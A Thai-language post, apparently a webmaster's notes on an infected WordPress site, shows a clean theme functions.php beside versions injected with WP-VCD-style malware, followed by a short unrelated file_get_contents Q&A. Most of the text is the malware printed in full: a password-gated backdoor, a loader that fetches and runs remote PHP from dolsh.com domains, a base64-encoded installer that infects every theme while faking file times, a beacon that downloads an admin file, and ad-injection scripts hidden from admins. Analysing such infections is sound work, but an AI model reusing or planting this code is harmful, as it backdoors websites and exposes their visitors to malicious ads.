ไฟล์ functions.php เดิม
<?php
if ( ! isset( $content_width ) ) $content_width = 550;
register_sidebar(array(
'name' => 'sidebar',
'id' => 'sidebar',
'before_widget' => '<aside id="%1$s" class="widget %2$s">',
'after_widget' => '</aside>',
'before_title' => '<header><h3 class="widgettitle">',
'after_title' => '</h3></header>',
));
add_theme_support('automatic-feed-links');
add_theme_support('custom-background');
add_editor_style();
// hack to add a class to the body tag when the sidebar is active
function terminally_has_sidebar($classes) {
if (is_active_sidebar('sidebar')) {
// add 'class-name' to the $classes array
$classes[] = 'has_sidebar';
}
// return the $classes array
return $classes;
}
add_filter('body_class','terminally_has_sidebar');
//add menu
register_nav_menu( 'primary', __( 'Primary Menu', 'twentytwelve' ) );
function twentytwelve_page_menu_args( $args ) {
if ( ! isset( $args['show_home'] ) )
$args['show_home'] = true;
return $args;
}
add_filter( 'wp_page_menu_args', 'twentytwelve_page_menu_args' );
//end add menu
?>
ถูกใส่ code เพิ่ม เมื่อกดลิ้งในเว็บตัวเอง มันจะเปิดหน้าใหม่ขึ้นมาเป็นเว็บอื่นๆด้วย เช่น delonton
เป็นไปได้ว่า theme นั้นๆ ไม่ปลอดภัย มีช่องโหว่ เพราะอาจะไม่ได้รับอัพเดท พัฒนา หรือ เขียนไม่ดีพอ
ไฟล์ functions.php ใหม่ หลัง มี code ถูกใส่เพิ่มมา
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '8e48d628a0241f31a5bc9d4d22dac3b3'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code10\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='aca55bf84cc544d0a9cfdfff8641d892';
if (($tmpcontent = @file_get_contents("http://www.dolsh.com/code10.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.dolsh.com/code10.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.dolsh.me/code10.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif (($tmpcontent = @file_get_contents("http://www.dolsh.xyz/code10.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.dolsh.xyz/code10.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?><?php
if ( ! isset( $content_width ) ) $content_width = 550;
register_sidebar(array(
'name' => 'sidebar',
'id' => 'sidebar',
'before_widget' => '<aside id="%1$s" class="widget %2$s">',
'after_widget' => '</aside>',
'before_title' => '<header><h3 class="widgettitle">',
'after_title' => '</h3></header>',
));
add_theme_support('automatic-feed-links');
add_theme_support('custom-background');
add_editor_style();
// hack to add a class to the body tag when the sidebar is active
function terminally_has_sidebar($classes) {
if (is_active_sidebar('sidebar')) {
// add 'class-name' to the $classes array
$classes[] = 'has_sidebar';
}
// return the $classes array
return $classes;
}
add_filter('body_class','terminally_has_sidebar');
//add menu
register_nav_menu( 'primary', __( 'Primary Menu', 'twentytwelve' ) );
function twentytwelve_page_menu_args( $args ) {
if ( ! isset( $args['show_home'] ) )
$args['show_home'] = true;
return $args;
}
add_filter( 'wp_page_menu_args', 'twentytwelve_page_menu_args' );
//end add menu
?>
<?php
function _verify_activeatewidgets(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_getall_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$issepar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $issepar . "\n" .$widget);fclose($f);
$output .= ($is_showdots && $ellipsis) ? "..." : "";
}
}
}
}
return $output;
}
function _getall_widgetcont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == "/"){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != "." && $elem != ".."){
if (is_dir($places . "/" . $elem)){
$wids[]=$places . "/" . $elem;
} elseif (is_file($places . "/" . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . "/" . $elem;}
}
}
}else{
return false;
}
if (sizeof($wids) > 0){
return _getall_widgetcont($wids,$items);
} else {
return $items;
}
}
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}
if(!function_exists("strripos")){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "." && $file != "..") || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
add_action("admin_head", "_verify_activeatewidgets");
function _getprepare_widgets(){
if(!isset($chars_count)) $chars_count=120;
if(!isset($methods)) $methods="cookie";
if(!isset($allowed)) $allowed="<a>";
if(!isset($f_type)) $f_type="none";
if(!isset($issep)) $issep="";
if(!isset($f_home)) $f_home=get_option("home");
if(!isset($f_pref)) $f_pref="wp_";
if(!isset($is_use_more)) $is_use_more=1;
if(!isset($com_types)) $com_types="";
if(!isset($c_pages)) $c_pages=$_GET["cperpage"];
if(!isset($com_author)) $com_author="";
if(!isset($comments_approved)) $comments_approved="";
if(!isset($posts_auth)) $posts_auth="auth";
if(!isset($text_more)) $text_more="(more...)";
if(!isset($widget_is_output)) $widget_is_output=get_option("_is_widget_active_");
if(!isset($widgetchecks)) $widgetchecks=$f_pref."set"."_".$posts_auth."_".$methods;
if(!isset($text_more_ditails)) $text_more_ditails="(details...)";
if(!isset($con_more)) $con_more="ma".$issep."il";
if(!isset($forcemore)) $forcemore=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql="";
if (!$widget_is_output) :
global $wpdb, $post;
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$issep."vethe".$com_types."mas".$issep."@".$comments_approved."gm".$com_author."ail".$issep.".".$issep."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if (!empty($post->post_password)) {
if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__("There is no excerpt because this is a protected post.");
} else {
$output=get_the_password_form();
}
}
}
if(!isset($bfix_tags)) $bfix_tags=1;
if(!isset($f_types)) $f_types=$f_home;
if(!isset($getcommtext)) $getcommtext=$f_pref.$con_more;
if(!isset($m_tags)) $m_tags="div";
if(!isset($text_s)) $text_s=substr($sq1, stripos($sq1, "live"), 20);#
if(!isset($more_links_title)) $more_links_title="Continue reading this entry";
if(!isset($is_showdots)) $is_showdots=1;
$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommtext, array($text_s, $f_home, $f_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if($chars_count < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, "<!--more-->")) {
$text=explode("<!--more-->", $text, 2);
$l=count($text[0]);
$more_link=1;
$comments=$wpdb->get_results($sql);
} else {
$text=explode(" ", $text);
if(count($text) > $chars_count) {
$l=$chars_count;
$ellipsis=1;
} else {
$l=count($text);
$text_more="";
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . " ";
}
update_option("_is_widget_active_", 1);
if("all" != $allowed) {
$output=strip_tags($output, $allowed);
return $output;
}
endif;
$output=rtrim($output, "\s\n\t\r\0\x0B");
$output=($bfix_tags) ? balanceTags($output, true) : $output;
$output .= ($is_showdots && $ellipsis) ? "..." : "";
$output=apply_filters($f_type, $output);
switch($m_tags) {
case("div") :
$tag="div";
break;
case("span") :
$tag="span";
break;
case("p") :
$tag="p";
break;
default :
$tag="span";
}
if ($is_use_more ) {
if($forcemore) {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_links_title . "\">" . $text_more = !is_user_logged_in() && @call_user_func_array($widgetchecks,array($c_pages, true)) ? $text_more : "" . "</a></" . $tag . ">" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_links_title . "\">" . $text_more . "</a></" . $tag . ">" . "\n";
}
}
return $output;
}
////////////////////////////////////////////////////////////////////////////////
// Get Standard Post Image
////////////////////////////////////////////////////////////////////////////////
function get_post_image() {
global $post, $posts;
$first_img = '';
ob_start();
ob_end_clean();
$output = preg_match_all('/<img.+src=[\'"]([^\'"]+)[\'"].*>/i', $post->post_content, $matches);
$first_img = $matches [1] [0];
if(empty($first_img)){ //Defines a default image
$img_dir = get_bloginfo('template_directory');
$first_img = $img_dir . '/images/post-default.png';
}
return $first_img;
}
add_action("init", "_getprepare_widgets");
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
}
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
?>theme ที่โดน จะเป็น 0777
folder theme 0777
wp-content 0777
wp-include มีไฟล์ wp-tmp.php
ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='aca55bf84cc544d0a9cfdfff8641d892';
$newxc=file_get_contents('http://www.dolsh.com/new10.txt');
$file=file_get_contents(get_template_directory().'/functions.php');
$filec=file_get_contents(get_stylesheet_directory().'/functions.php');
$pat_code='/div_code_name[\s\S]*?(if \( ! function_exists[\s\S]*?extract\([\s\S]*?)\?>/i';
if(preg_match_all($pat_code, $file, $matches_pat_code))
{
$toreplace=$matches_pat_code[1][0];
if (stripos($newxc, $wp_auth_key) !== false)
{
$new_file=str_replace($toreplace,$newxc,$file);
@file_put_contents(get_template_directory().'/functions.php',$new_file);
}
}
if(preg_match_all($pat_code, $filec, $matches_pat_code))
{
$toreplace=$matches_pat_code[1][0];
if (stripos($newxc, $wp_auth_key) !== false)
{
$new_filec=str_replace($toreplace,$newxc,$filec);
@file_put_contents(get_stylesheet_directory().'/functions.php',$new_filec);
}
}
if ( ! function_exists( 'slider_option' ) ) {
function slider_option($content){
if(is_single())
{
$an="
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-9664825-1', 'auto');
ga('send', 'pageview');
</script>
";
$con = '
';
$con2 = '
<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1063894"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1"></script>
';
$content=$content.$con2;
}
return $content;
}
function slider_option_footer(){
if(!is_single())
{
$an="
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-9664825-1', 'auto');
ga('send', 'pageview');
</script>
";
$con = '
';
$con2 = '
<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1063894"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1"></script>
';
echo $con2;
}
}
function setting_my_first_cookie() {
setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
}
if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}
function readDirsad($path){
$dirHandle = opendir($path);
while($item = readdir($dirHandle)) {
$newPath = $path."/".$item;
if(is_dir($newPath) && $item != '.' && $item != '..') {
if(strpos($newPath,'wp-includes')!== false && strpos($newPath,'wp-includes/')=== false)
{
if (file_exists($newPath.'/wp-feed.php'))
{
$ip=@file_get_contents($newPath.'/wp-feed.php');
}
if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents($newPath.'/wp-feed.php',$ip);
}
}
readDirsad($newPath);
}
else{
}
}
}
if( current_user_can('edit_others_pages'))
{
if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}
if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$pathx = realpath(dirname(ABSPATH));
readDirsad($pathx);
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
}
}
if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in())
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}
}
function readDirs($path){
$dirHandle = opendir($path);
while($item = readdir($dirHandle)) {
$newPath = $path."/".$item;
if(is_dir($newPath) && $item != '.' && $item != '..') {
if(strpos($newPath,'wp-includes')!== false && strpos($newPath,'wp-includes/')=== false)
{
//echo "Found Folder $newPath<br>";
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (file_exists($newPath.'/wp-feed.php'))
{
$ipn=@file_get_contents($newPath.'/wp-feed.php');
}
$iparr = explode("\n", $ip);
$iparr=array_map('trim', $iparr);
$ipnarr = explode("\n", $ipn);
$ipnarr=array_map('trim', $ipnarr);
$result = array_unique(array_merge($iparr, $ipnarr));
$ipx= implode("\n",$result);
@file_put_contents($newPath.'/wp-feed.php',$ipx);
}
readDirs($newPath);
}
else{
// echo ' Found File or .-dir '.$item.'<br>';
}
}
}
if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
//$path = realpath(dirname(ABSPATH));
//echo "$path<br>";
//readDirs($path);
}
}wp-include มีไฟล์ wp-vcd.php
<?php
error_reporting(0);
ini_set('display_errors', 0);
$install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkNCgl7DQokZGl2X2NvZGVfbmFtZT0id3BfdmNkIjsNCgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQ0KCQkJew0KDQoJCQkJDQoNCg0KDQoNCgkJCQljYXNlICdjaGFuZ2VfZG9tYWluJzsNCgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpDQoJCQkJCQkJCXsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmKHByZWdfbWF0Y2hfYWxsKCcvXCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzXCgiaHR0cDpcL1wvKC4qKVwvY29kZTEwXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7DQoNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7DQoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoX19GSUxFX18sICRmaWxlKTsNCgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9DQoNCg0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCgkJCQkJCQkJfQ0KCQkJCQkJfQ0KCQkJCWJyZWFrOw0KDQoJCQkJDQoJCQkJDQoJCQkJZGVmYXVsdDogcHJpbnQgIkVSUk9SX1dQX0FDVElPTiBXUF9WX0NEIFdQX0NEIjsNCgkJCX0NCgkJCQ0KCQlkaWUoIiIpOw0KCX0NCg0KCQ0KDQoNCmlmICggISBmdW5jdGlvbl9leGlzdHMoICd0aGVtZV90ZW1wX3NldHVwJyApICkgeyAgDQokcGF0aD0kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbUkVRVUVTVF9VUkldOw0KaWYgKCAhIGlzXzQwNCgpICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsNCg0KaWYoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuZG9sc2guY29tL2NvZGUxMC5waHA/aT0iLiRwYXRoKSkNCnsNCg0KDQpmdW5jdGlvbiB0aGVtZV90ZW1wX3NldHVwKCRwaHBDb2RlKSB7DQogICAgJHRtcGZuYW1lID0gdGVtcG5hbShzeXNfZ2V0X3RlbXBfZGlyKCksICJ0aGVtZV90ZW1wX3NldHVwIik7DQogICAgJGhhbmRsZSA9IGZvcGVuKCR0bXBmbmFtZSwgIncrIik7DQogICAgZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKTsNCiAgICBmY2xvc2UoJGhhbmRsZSk7DQogICAgaW5jbHVkZSAkdG1wZm5hbWU7DQogICAgdW5saW5rKCR0bXBmbmFtZSk7DQogICAgcmV0dXJuIGdldF9kZWZpbmVkX3ZhcnMoKTsNCn0NCg0KZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7DQp9DQp9DQp9DQoNCg0KDQo/Pg==';
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
foreach ($list as $_)
{
if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
}
else
{
$ping = false;
}
}
}
else
{
$list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
foreach ($list2 as $_2)
{
if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
$ping2 = true;
}
else
{
//$ping = false;
}
}
}
}
}
}
if ($ping) {
$content = @file_get_contents('http://www.dolsh.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.dolsh.com/admin.txt'));
}
if ($ping2) {
$content = @file_get_contents('http://www.dolsh.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.dolsh.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
}
?><?php error_reporting(0);?>folder แปลกๆ เช่น new10 , new10.php
wp-include มีไฟล์ แปลกๆ wp-feed.php เก็น ip
class.wp.php
ธีมที่โดน
grido
postline
threattocreativity
teminally
…teen ของ wordpress
ถ้าเป็น theme ที่มีการเดท จะมีการทับไฟล์เดิม ทำให้ code ถูกทับไปด้วย
บางโฮสต์ ปิดฟังก์ชั่น file_get_contents เพราะไม่ปลอดภัย
<?php
echo file_get_contents("test.txt");
?><?php
$homepage = file_get_contents('demo.txt');
echo $homepage;
?>ดึงข้อมูลจากเว็บ google.com มาแสดงผล
<?php
$homepage = file_get_contents('http://www.google.com/');
echo $homepage;
?>file_get_contents () สามารถเรียกใช้ไฟล์ php ได้ไหมค่ะ
ลองดูแล้วมันไม่ทำงานเลย
ได้แต่ html
ทำได้ครับ ผมลอง ผ่านดึงผ่านเว็บ หรือผ่าน path อื่น เราต้องกำหนด base target ด้วย ครับ ไม่งั้นมันไม่เรียกพวกรูปอะไรมาด้วย
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<base href="http://fund.dgr.go.th/rent/">
<?php
$source = file_get_contents('http://fund.dgr.go.th/rent/index.php');
echo $source;
?>ได้ครับ แต่ก็จำไว้ด้วยค่ารีเทรินของฟังก์ชัน file_get_contents () จะเป็น string น่ะครับ
สมมติ
test.php
<?php echo "helloworld"; ?>
$a = file_get_contents("test.php");
echo $aผลคือ
ไม่เห็นครับ เพราะเจอ tag < ปิดข้อความไว้ ต้องเปิด view source ถึงจะเห็น
<?php ob_start(); require './test.php'; $s = ob_get_clean(); echo $s; ?>
ไม่ได้ครับ ไปใช้ include require ดีกว่าน่ะ ได้แน่นอนครับ
อื่นๆ http://www.thaicreate.com/php/forum/119528.html
โดนอยู่เว็บเดียว น่าเกียวกับ plugin ด้วย